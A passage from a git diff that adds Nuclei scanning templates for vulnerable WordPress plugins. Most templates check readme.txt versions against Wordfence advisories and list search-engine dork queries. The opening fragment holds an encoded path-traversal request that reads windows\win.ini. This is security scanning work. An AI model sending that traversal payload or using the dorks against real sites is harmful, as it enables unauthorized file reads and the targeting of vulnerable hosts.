/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: or + matchers: + - type: dsl + name: lfi + dsl: + - 'contains_all(body, "for 16-bit", "[fonts]", "[extensions]")' + - 'contains(content_type, "application/octet-stream")' + - 'status_code == 200' + condition: and + + - type: dsl + name: xss + dsl: + - 'contains_all(body, "={\"AeDebug")' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and +# digest: 4a0a00473045022073fb6629bd8a91705b1061035210bcd66d24136bb813085100ac437c95f8270f022100cb45f86cc14cf6cd92ce6bac43aa9e3e4c202a1df313a7489b1855c0cb36dfa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/apppresser-05523ca99a6812ce9a8ee1b96d42e704.yaml b/poc/other/apppresser-05523ca99a6812ce9a8ee1b96d42e704.yaml new file mode 100644 index 0000000000..2a41e54cd4 --- /dev/null +++ b/poc/other/apppresser-05523ca99a6812ce9a8ee1b96d42e704.yaml @@ -0,0 +1,59 @@ +id: apppresser-05523ca99a6812ce9a8ee1b96d42e704 + +info: + name: > + AppPresser – Mobile App Framework <= 4.4.6 - Unauthenticated Privilege Escalation via Password Reset + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/43cb0399-4add-43d5-863c-30e11803bd90?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/apppresser/" + google-query: inurl:"/wp-content/plugins/apppresser/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,apppresser,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/apppresser/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "apppresser" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.4.6') \ No newline at end of file diff --git a/poc/other/bluetrait-event-viewer-401534e15701284d7d10ed528a79ca69.yaml b/poc/other/bluetrait-event-viewer-401534e15701284d7d10ed528a79ca69.yaml new file mode 100644 index 0000000000..1c69b7dd19 --- /dev/null +++ b/poc/other/bluetrait-event-viewer-401534e15701284d7d10ed528a79ca69.yaml @@ -0,0 +1,59 @@ +id: bluetrait-event-viewer-401534e15701284d7d10ed528a79ca69 + +info: + name: > + BTEV <= Cross-Site Request Forgery to Plugin Settings Update + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/215be163-f362-4bda-b81a-65ec955968a2?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bluetrait-event-viewer/" + google-query: inurl:"/wp-content/plugins/bluetrait-event-viewer/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bluetrait-event-viewer,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bluetrait-event-viewer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bluetrait-event-viewer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.2') \ No newline at end of file diff --git a/poc/other/booking-calendar-b3cd350c4619e9b5bfb265fa7add2acb.yaml b/poc/other/booking-calendar-b3cd350c4619e9b5bfb265fa7add2acb.yaml new file mode 100644 index 0000000000..92ce9edee5 --- /dev/null +++ b/poc/other/booking-calendar-b3cd350c4619e9b5bfb265fa7add2acb.yaml @@ -0,0 +1,59 @@ +id: booking-calendar-b3cd350c4619e9b5bfb265fa7add2acb + +info: + name: > + Booking calendar, Appointment Booking System <= 3.2.15 - Unauthenticated Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1fb05281-205f-4d9c-aac9-2b37e069a6fb?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/booking-calendar/" + google-query: inurl:"/wp-content/plugins/booking-calendar/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,booking-calendar,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/booking-calendar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "booking-calendar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.15') \ No newline at end of file diff --git a/poc/other/cleantalk-spam-protect-b4bd0e37d2f4b2ce18d4435f62478a5b.yaml b/poc/other/cleantalk-spam-protect-b4bd0e37d2f4b2ce18d4435f62478a5b.yaml new file mode 100644 index 0000000000..d55177271c --- /dev/null +++ b/poc/other/cleantalk-spam-protect-b4bd0e37d2f4b2ce18d4435f62478a5b.yaml @@ -0,0 +1,59 @@ +id: cleantalk-spam-protect-b4bd0e37d2f4b2ce18d4435f62478a5b + +info: + name: > + Spam protection, Anti-Spam, FireWall by CleanTalk <= 6.44 - Authorization Bypass due to Missing Empty Value Check to Unauthenticated Arbitrary Plugin Installation + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/79ae062c-b084-4045-9407-2d94919993af?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cleantalk-spam-protect/" + google-query: inurl:"/wp-content/plugins/cleantalk-spam-protect/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cleantalk-spam-protect,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cleantalk-spam-protect/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cleantalk-spam-protect" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.44') \ No newline at end of file diff --git a/poc/other/elementor-2c0ba7008797c295f2668278862f26f2.yaml b/poc/other/elementor-2c0ba7008797c295f2668278862f26f2.yaml new file mode 100644 index 0000000000..393223a003 --- /dev/null +++ b/poc/other/elementor-2c0ba7008797c295f2668278862f26f2.yaml @@ -0,0 +1,59 @@ +id: elementor-2c0ba7008797c295f2668278862f26f2 + +info: + name: > + Elementor Website Builder – More than Just a Page Builder <= 3.25.7 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b1305be5-8267-475f-b962-62e3930116e1?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/elementor/" + google-query: inurl:"/wp-content/plugins/elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.25.7') \ No newline at end of file diff --git a/poc/other/inpost-gallery-2919c831aa5a75589b7d8a36cf988930.yaml b/poc/other/inpost-gallery-2919c831aa5a75589b7d8a36cf988930.yaml new file mode 100644 index 0000000000..846b0e54d1 --- /dev/null +++ b/poc/other/inpost-gallery-2919c831aa5a75589b7d8a36cf988930.yaml @@ -0,0 +1,59 @@ +id: inpost-gallery-2919c831aa5a75589b7d8a36cf988930 + +info: + name: > + InPost Gallery <= 2.1.4.2 - Authenticated (Subscriber+) Arbitrary Shortcode Execution via inpost_gallery_get_shortcode_template + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5fbb2dcf-38b8-4ef1-bfea-bf5872cc7e37?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/inpost-gallery/" + google-query: inurl:"/wp-content/plugins/inpost-gallery/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,inpost-gallery,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/inpost-gallery/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "inpost-gallery" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.4.2') \ No newline at end of file diff --git a/poc/other/jeg-elementor-kit-65f8ab2de6de83568fad8650a9c6403f.yaml b/poc/other/jeg-elementor-kit-65f8ab2de6de83568fad8650a9c6403f.yaml new file mode 100644 index 0000000000..e98d887cd3 --- /dev/null +++ b/poc/other/jeg-elementor-kit-65f8ab2de6de83568fad8650a9c6403f.yaml @@ -0,0 +1,59 @@ +id: jeg-elementor-kit-65f8ab2de6de83568fad8650a9c6403f + +info: + name: > + Jeg Elementor Kit <= 2.6.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via JKit - Countdown Widget + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/98aed079-672c-43bb-a5eb-faf8ffc04b71?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/jeg-elementor-kit/" + google-query: inurl:"/wp-content/plugins/jeg-elementor-kit/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,jeg-elementor-kit,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/jeg-elementor-kit/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jeg-elementor-kit" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.9') \ No newline at end of file diff --git a/poc/other/jeg-elementor-kit-8661863ce6f4b8a6d1c36b185972e474.yaml b/poc/other/jeg-elementor-kit-8661863ce6f4b8a6d1c36b185972e474.yaml new file mode 100644 index 0000000000..aecce22664 --- /dev/null +++ b/poc/other/jeg-elementor-kit-8661863ce6f4b8a6d1c36b185972e474.yaml @@ -0,0 +1,59 @@ +id: jeg-elementor-kit-8661863ce6f4b8a6d1c36b185972e474 + +info: + name: > + Jeg Elementor Kit <= 2.6.9 - Authenticated (Contributor+) Sensitive Information Exposure via sg_content_template + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4efc9c47-321a-4635-943f-785ffc34d851?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/jeg-elementor-kit/" + google-query: inurl:"/wp-content/plugins/jeg-elementor-kit/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,jeg-elementor-kit,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/jeg-elementor-kit/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jeg-elementor-kit" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.9') \ No newline at end of file diff --git a/poc/other/security-malware-firewall-7797f9e03c89bedae049ae2c17c746f0.yaml b/poc/other/security-malware-firewall-7797f9e03c89bedae049ae2c17c746f0.yaml new file mode 100644 index 0000000000..9ce26eb929 --- /dev/null +++ b/poc/other/security-malware-firewall-7797f9e03c89bedae049ae2c17c746f0.yaml @@ -0,0 +1,59 @@ +id: security-malware-firewall-7797f9e03c89bedae049ae2c17c746f0 + +info: + name: > + Security & Malware scan by CleanTalk <= 2.145 - Authorization Bypass via Reverse DNS Spoofing to Unauthenticated SQL Injection + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2187311d-6651-4eca-806d-aa2ff9fae4e2?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/security-malware-firewall/" + google-query: inurl:"/wp-content/plugins/security-malware-firewall/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,security-malware-firewall,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/security-malware-firewall/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "security-malware-firewall" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.145') \ No newline at end of file diff --git a/poc/other/skt-nurcaptcha-f122a6109fde182691f204ad9efb3807.yaml b/poc/other/skt-nurcaptcha-f122a6109fde182691f204ad9efb3807.yaml new file mode 100644 index 0000000000..3781bf1825 --- /dev/null +++ b/poc/other/skt-nurcaptcha-f122a6109fde182691f204ad9efb3807.yaml @@ -0,0 +1,59 @@ +id: skt-nurcaptcha-f122a6109fde182691f204ad9efb3807 + +info: + name: > + Skt NURCaptcha <= 3.5.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/96e47918-7848-407a-8f77-dbbfeb17029d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/skt-nurcaptcha/" + google-query: inurl:"/wp-content/plugins/skt-nurcaptcha/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,skt-nurcaptcha,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/skt-nurcaptcha/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "skt-nurcaptcha" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.0') \ No newline at end of file diff --git a/poc/other/support-svg-108b7823fe9b1674d1b2bbf51f4ed1b3.yaml b/poc/other/support-svg-108b7823fe9b1674d1b2bbf51f4ed1b3.yaml new file mode 100644 index 0000000000..f45cbbdd0b --- /dev/null +++ b/poc/other/support-svg-108b7823fe9b1674d1b2bbf51f4ed1b3.yaml @@ -0,0 +1,59 @@ +id: support-svg-108b7823fe9b1674d1b2bbf51f4ed1b3 + +info: + name: > + Support SVG – Upload svg files in wordpress without hassle <= 1.1.0 - Authenticated (Author+) Stored Cross-site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d9207baf-348c-4d3b-a6f0-cbfcd2624f78?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/support-svg/" + google-query: inurl:"/wp-content/plugins/support-svg/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,support-svg,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/support-svg/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "support-svg" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.0') \ No newline at end of file diff --git a/poc/remote_code_execution/additional-order-filters-for-woocommerce-871d7de019dc16d9e0194a95c1418987.yaml b/poc/remote_code_execution/additional-order-filters-for-woocommerce-871d7de019dc16d9e0194a95c1418987.yaml new file mode 100644 index 0000000000..d69bea58d7 --- /dev/null +++ b/poc/remote_code_execution/additional-order-filters-for-woocommerce-871d7de019dc16d9e0194a95c1418987.yaml @@ -0,0 +1,59 @@ +id: additional-order-filters-for-woocommerce-871d7de019dc16d9e0194a95c1418987 + +info: + name: > + Additional Order Filters for WooCommerce <= 1.21 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d59ea96f-ad02-4189-8155-7de7de5556ba?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/additional-order-filters-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/additional-order-filters-for-woocommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,additional-order-filters-for-woocommerce,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/additional-order-filters-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "additional-order-filters-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.21') \ No newline at end of file diff --git a/poc/remote_code_execution/product-input-fields-for-woocommerce-c39fb77f63e19b35a67746752819632d.yaml b/poc/remote_code_execution/product-input-fields-for-woocommerce-c39fb77f63e19b35a67746752819632d.yaml new file mode 100644 index 0000000000..f61bf5054e --- /dev/null +++ b/poc/remote_code_execution/product-input-fields-for-woocommerce-c39fb77f63e19b35a67746752819632d.yaml @@ -0,0 +1,59 @@ +id: product-input-fields-for-woocommerce-c39fb77f63e19b35a67746752819632d + +info: + name: > + Product Input Fields for WooCommerce <= 1.9 - Authenticated (Contributor+) Arbitrary File Read + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e45207af-3886-4d95-9cd8-5ecdc683dc58?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/product-input-fields-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/product-input-fields-for-woocommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,product-input-fields-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/product-input-fields-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "product-input-fields-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9') \ No newline at end of file diff --git a/poc/remote_code_execution/woocommerce-booking-4e73e0f016338be497c921cd08f860d0.yaml b/poc/remote_code_execution/woocommerce-booking-4e73e0f016338be497c921cd08f860d0.yaml new file mode 100644 index 0000000000..1ef79eca29 --- /dev/null +++ b/poc/remote_code_execution/woocommerce-booking-4e73e0f016338be497c921cd08f860d0.yaml @@ -0,0 +1,59 @@ +id: woocommerce-booking-4e73e0f016338be497c921cd08f860d0 + +info: + name: > + Booking & Appointment Plugin for WooCommerce <= 6.9.0 - Authenticated (Subscriber+) Arbitrary Option Update + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6ed215da-10c5-469b-bab2-923808feebd4?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woocommerce-booking/" + google-query: inurl:"/wp-content/plugins/woocommerce-booking/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woocommerce-booking,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-booking/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-booking" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.9.0') \ No newline at end of file diff --git a/poc/remote_code_execution/woocommerce-jetpack-df377aa55171c3c6046688a216c80943.yaml b/poc/remote_code_execution/woocommerce-jetpack-df377aa55171c3c6046688a216c80943.yaml new file mode 100644 index 0000000000..7dbb631a6a --- /dev/null +++ b/poc/remote_code_execution/woocommerce-jetpack-df377aa55171c3c6046688a216c80943.yaml @@ -0,0 +1,59 @@ +id: woocommerce-jetpack-df377aa55171c3c6046688a216c80943 + +info: + name: > + Booster for WooCommerce <= 7.2.3 - Authenticated (ShopManager+) Stored Cross-Site Scripting via wcj_product_meta Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0abf9705-2716-403f-9348-e43a8d8fb1d2?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woocommerce-jetpack/" + google-query: inurl:"/wp-content/plugins/woocommerce-jetpack/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woocommerce-jetpack,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-jetpack/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-jetpack" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.2.3') \ No newline at end of file diff --git a/poc/search/cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9.yaml b/poc/search/cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9.yaml new file mode 100644 index 0000000000..6535040471 --- /dev/null +++ b/poc/search/cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9.yaml @@ -0,0 +1,59 @@ +id: cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9 + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cm-on-demand-search-and-replace/" + google-query: inurl:"/wp-content/plugins/cm-on-demand-search-and-replace/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cm-on-demand-search-and-replace,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-on-demand-search-and-replace/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-on-demand-search-and-replace" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.2') \ No newline at end of file diff --git a/poc/social/twitter-posts-8f2dbde369351cc27693796adbcd9a58.yaml b/poc/social/twitter-posts-8f2dbde369351cc27693796adbcd9a58.yaml new file mode 100644 index 0000000000..240903a856 --- /dev/null +++ b/poc/social/twitter-posts-8f2dbde369351cc27693796adbcd9a58.yaml @@ -0,0 +1,59 @@ +id: twitter-posts-8f2dbde369351cc27693796adbcd9a58 + +info: + name: > + TwitterPosts <= 1.0.2 - Cross-Site Request Forgery to Plugin Settings Update + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/66f82859-1798-42ed-bb6a-44b0af438c7f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/twitter-posts/" + google-query: inurl:"/wp-content/plugins/twitter-posts/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,twitter-posts,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/twitter-posts/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "twitter-posts" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/sql/CVE-2023-7297-a95d63f970ebd421a8709918222db375.yaml b/poc/sql/CVE-2023-7297-a95d63f970ebd421a8709918222db375.yaml new file mode 100644 index 0000000000..34870a3229 --- /dev/null +++ b/poc/sql/CVE-2023-7297-a95d63f970ebd421a8709918222db375.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-7297-a95d63f970ebd421a8709918222db375 + +info: + name: > + TwitterPosts <= 1.0.2 - Cross-Site Request Forgery to Plugin Settings Update + author: topscoder + severity: medium + description: > + The TwitterPosts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.2. This is due to missing or incorrect nonce validation on one of its functions. This makes it possible for unauthenticated attackers to change the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/66f82859-1798-42ed-bb6a-44b0af438c7f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2023-7297 + metadata: + fofa-query: "wp-content/plugins/twitter-posts/" + google-query: inurl:"/wp-content/plugins/twitter-posts/" + shodan-query: 'vuln:CVE-2023-7297' + tags: cve,wordpress,wp-plugin,twitter-posts,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/twitter-posts/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "twitter-posts" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/sql/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml b/poc/sql/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml new file mode 100644 index 0000000000..efba34e940 --- /dev/null +++ b/poc/sql/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9 